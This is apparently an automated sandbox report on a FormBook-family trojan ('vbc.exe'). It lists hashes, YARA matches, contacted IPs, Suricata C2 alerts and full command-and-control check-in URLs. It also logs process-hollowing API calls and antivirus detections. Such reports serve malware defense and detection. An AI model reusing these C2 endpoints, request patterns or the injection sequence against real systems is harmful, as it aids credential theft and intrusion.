Summary | ZeroBOX

vbc.exe

  • Malicious Library
  • UPX
  • PE File
  • DLL
  • OS Processor Check
  • PE32
Category FILE
Machine s1_win7_x6401
Started Nov. 17, 2021, 5:22 p.m.
Completed Nov. 17, 2021, 5:26 p.m.
Size 533.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 7c875245a2618b56ad9f9ee5b11bc6c8
SHA256 a81f4b0d0e1d5cc93e06323610f8500c2f0a0b5c15c890c104e3234bfee7fa68
CRC32 474DFB08
ssdeep 12288:iRnGW2kdxm7TNt9KeybAt1PSsczzGl5TYM2Dx:lcxm7TNt9Ke4E4ml5TYNl
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file

IP Address Status Action
104.21.30.245 Active Moloch
107.152.33.165 Active Moloch
13.250.255.10 Active Moloch
154.196.6.137 Active Moloch
156.230.178.28 Active Moloch
156.235.177.206 Active Moloch
164.124.101.2 Active Moloch
185.111.247.38 Active Moloch
195.201.204.153 Active Moloch
23.227.38.74 Active Moloch
3.64.163.50 Active Moloch
34.102.136.180 Active Moloch
34.80.190.141 Active Moloch
82.194.74.104 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49169 -> 82.194.74.104:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 82.194.74.104:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49169 -> 82.194.74.104:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 156.235.177.206:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 156.235.177.206:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49174 -> 156.235.177.206:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 23.227.38.74:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 23.227.38.74:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 23.227.38.74:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 185.111.247.38:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 185.111.247.38:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 185.111.247.38:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 156.230.178.28:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 156.230.178.28:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 156.230.178.28:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 195.201.204.153:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 195.201.204.153:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49166 -> 195.201.204.153:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 34.80.190.141:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 34.80.190.141:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49167 -> 34.80.190.141:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 34.80.190.141:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 34.80.190.141:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 107.152.33.165:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 34.80.190.141:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 107.152.33.165:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49170 -> 107.152.33.165:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 13.250.255.10:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 13.250.255.10:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 13.250.255.10:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 34.102.136.180:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 34.102.136.180:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 154.196.6.137:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 154.196.6.137:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49172 -> 154.196.6.137:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 3.64.163.50:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49171 -> 34.102.136.180:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 3.64.163.50:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 3.64.163.50:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

Status 1 Return 1 Repeated 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.ankitparihar.tech/s564/?DVoh7=qce3mniYJcUhGx6jJjQMypui68ggNYf4/cO+HRHDV2VTi0u3SOO7dhmWmLL1mXoL3jcKGyMD&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.goodfellascandoit.com/s564/?DVoh7=ZwqRkEb4YRudDQ5ao8MwUHoxZPnMRmYHWHgc2VuI9I/AWmS3hl7qr2I2ZaHL5QcQU5yYttSO&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.lo-nen.com/s564/?DVoh7=IoV10A9O9hI6xjd/Eu7xuTiDCqg5LFcSex0dmUHIfcr7tPMxLFFZRdTUSRPxaWdhtzN0wraY&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.productorslleida.cat/s564/?DVoh7=7vabDz73e2nBzFkhscXM1YUiiHdja1EfGByayVmH6y4sIKs7M/TWvQk3EGFoqlqGhGGH9VVQ&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.irlimcastore.com/s564/?DVoh7=tkxI0Mb4LtGWKS3F0F6uiGGSRSKHBaD6YH7HRTUImw9RnBOVaG+V/J3focIq/1NJJ9X8IXvr&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.realitytv.info/s564/?DVoh7=zFCjVjU4JD89Kye1rgvfte5q2HyViySNgPaGPcqg7zhnj9W/GJZy3a1Uiylr3MkqWgTQSH3i&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.krishnaengg.net/s564/?DVoh7=NlM2N+iiFwPSoOT/Rr2+VMHzjg0aPXuW8iNMk7SgAqucDRmRukkc4UYfZernm7k5MkxzPDpj&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.lrzoi.com/s564/?DVoh7=/DnP3brMbYSuodHq+1CqfNqxM6iFwKvfgvTsg7hi5QHuFPK85k4JAi7jkrMCin/3ikeWNIS0&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.gymass.com/s564/?DVoh7=mZz/UD0sXu6NPFw+t/AnerZg+DQ2IFpihByc1oG/U8wldi4ETkat0SIWDqG2aHPqXpodcPrp&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.accoladeleatherco.com/s564/?DVoh7=THangPgtxD5xwoas5y2S8tj4iTZ/CIysvf0w5FQFBkXYtdNoA6jg0UBXoRSeu31uR0gRAIpl&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.darqaftan.com/s564/?DVoh7=JzBuSKaJNb6j5KfT1bFXWjNUE/5oXAoCXlzu9BAxc5PloFX7PVbr115No1e84HoruL7HfMze&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.shyezhuo.com/s564/?DVoh7=2GrapIe6ItaFFknROml73pv0cgwBQmPYZZ7mdImcBQwY3AApWnrpiBowaynuclZYYj7IDedM&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.fuli.tech/s564/?DVoh7=9f6qGfOfyDOlMScrH6KKwHJ+2xXQ8xdlAf1yPUDkje30zSjnzLS7xurMqwj7zaj6zJzd0cBy&6l=TlPx
suspicious_features GET method with no useragent header suspicious_request GET http://www.tuthuocgiadinh.store/s564/?DVoh7=DKK7aaacJqL9nJRf1WUrmc6x0mDq8ntwSfjAo261O7x5yXk6bM/WINMG1mzVKolgsX3t92gZ&6l=TlPx
request GET http://www.ankitparihar.tech/s564/?DVoh7=qce3mniYJcUhGx6jJjQMypui68ggNYf4/cO+HRHDV2VTi0u3SOO7dhmWmLL1mXoL3jcKGyMD&6l=TlPx
request GET http://www.goodfellascandoit.com/s564/?DVoh7=ZwqRkEb4YRudDQ5ao8MwUHoxZPnMRmYHWHgc2VuI9I/AWmS3hl7qr2I2ZaHL5QcQU5yYttSO&6l=TlPx
request GET http://www.lo-nen.com/s564/?DVoh7=IoV10A9O9hI6xjd/Eu7xuTiDCqg5LFcSex0dmUHIfcr7tPMxLFFZRdTUSRPxaWdhtzN0wraY&6l=TlPx
request GET http://www.productorslleida.cat/s564/?DVoh7=7vabDz73e2nBzFkhscXM1YUiiHdja1EfGByayVmH6y4sIKs7M/TWvQk3EGFoqlqGhGGH9VVQ&6l=TlPx
request GET http://www.irlimcastore.com/s564/?DVoh7=tkxI0Mb4LtGWKS3F0F6uiGGSRSKHBaD6YH7HRTUImw9RnBOVaG+V/J3focIq/1NJJ9X8IXvr&6l=TlPx
request GET http://www.realitytv.info/s564/?DVoh7=zFCjVjU4JD89Kye1rgvfte5q2HyViySNgPaGPcqg7zhnj9W/GJZy3a1Uiylr3MkqWgTQSH3i&6l=TlPx
request GET http://www.krishnaengg.net/s564/?DVoh7=NlM2N+iiFwPSoOT/Rr2+VMHzjg0aPXuW8iNMk7SgAqucDRmRukkc4UYfZernm7k5MkxzPDpj&6l=TlPx
request GET http://www.lrzoi.com/s564/?DVoh7=/DnP3brMbYSuodHq+1CqfNqxM6iFwKvfgvTsg7hi5QHuFPK85k4JAi7jkrMCin/3ikeWNIS0&6l=TlPx
request GET http://www.gymass.com/s564/?DVoh7=mZz/UD0sXu6NPFw+t/AnerZg+DQ2IFpihByc1oG/U8wldi4ETkat0SIWDqG2aHPqXpodcPrp&6l=TlPx
request GET http://www.accoladeleatherco.com/s564/?DVoh7=THangPgtxD5xwoas5y2S8tj4iTZ/CIysvf0w5FQFBkXYtdNoA6jg0UBXoRSeu31uR0gRAIpl&6l=TlPx
request GET http://www.darqaftan.com/s564/?DVoh7=JzBuSKaJNb6j5KfT1bFXWjNUE/5oXAoCXlzu9BAxc5PloFX7PVbr115No1e84HoruL7HfMze&6l=TlPx
request GET http://www.shyezhuo.com/s564/?DVoh7=2GrapIe6ItaFFknROml73pv0cgwBQmPYZZ7mdImcBQwY3AApWnrpiBowaynuclZYYj7IDedM&6l=TlPx
request GET http://www.fuli.tech/s564/?DVoh7=9f6qGfOfyDOlMScrH6KKwHJ+2xXQ8xdlAf1yPUDkje30zSjnzLS7xurMqwj7zaj6zJzd0cBy&6l=TlPx
request GET http://www.tuthuocgiadinh.store/s564/?DVoh7=DKK7aaacJqL9nJRf1WUrmc6x0mDq8ntwSfjAo261O7x5yXk6bM/WINMG1mzVKolgsX3t92gZ&6l=TlPx
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73a12000
process_handle: 0xffffffff
Status 1 Return 0 Repeated 0

NtProtectVirtualMemory

process_identifier: 2776
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74325000
process_handle: 0xffffffff
Status 1 Return 0 Repeated 0

NtAllocateVirtualMemory

process_identifier: 2876
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00870000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
Status 1 Return 0 Repeated 0
file C:\Users\test22\AppData\Local\Temp\nsdE010.tmp\oinzo.dll
file C:\Users\test22\AppData\Local\Temp\nsdE010.tmp\oinzo.dll
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
Status 1 Return 1 Repeated 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2876
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000214
Status 1 Return 0 Repeated 0
Process injection Process 2776 called NtSetContextThread to modify thread in remote process 2876
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 2003108292
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314096
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000020c
process_identifier: 2876
Status 1 Return 0 Repeated 0
Lionic Trojan.Win32.Androm.4!c
Elastic malicious (high confidence)
Cynet Malicious (score: 100)
FireEye Zum.Androm.1
Cybereason malicious.5a2618
Cyren W32/Injector.APR.gen!Eldorado
Symantec Packed.Generic.606
ESET-NOD32 a variant of Win32/Injector.EQOA
APEX Malicious
Paloalto generic.ml
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender Zum.Androm.1
MicroWorld-eScan Zum.Androm.1
Emsisoft Zum.Androm.1 (B)
McAfee-GW-Edition BehavesLike.Win32.Dropper.hc
Sophos Mal/Generic-S
SentinelOne Static AI - Suspicious PE
MAX malware (ai score=84)
Kingsoft Win32.Troj.Generic_a.a.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
GData Zum.Androm.1
McAfee Artemis!7C875245A261
Malwarebytes Trojan.Injector
Ikarus Trojan.NSIS.Agent.S
Fortinet W32/Injector.APR!tr
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2880
thread_handle: 0x0000020c
process_identifier: 2876
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\vbc.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\vbc.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\vbc.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000214
Status 1 Return 1 Repeated 0

NtGetContextThread

thread_handle: 0x0000020c
Status 1 Return 0 Repeated 0

NtAllocateVirtualMemory

process_identifier: 2876
region_size: 167936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000214
Status 1 Return 0 Repeated 0

NtSetContextThread

registers.eip: 2003108292
registers.esp: 1638384
registers.edi: 0
registers.eax: 4314096
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x0000020c
process_identifier: 2876
Status 1 Return 0 Repeated 0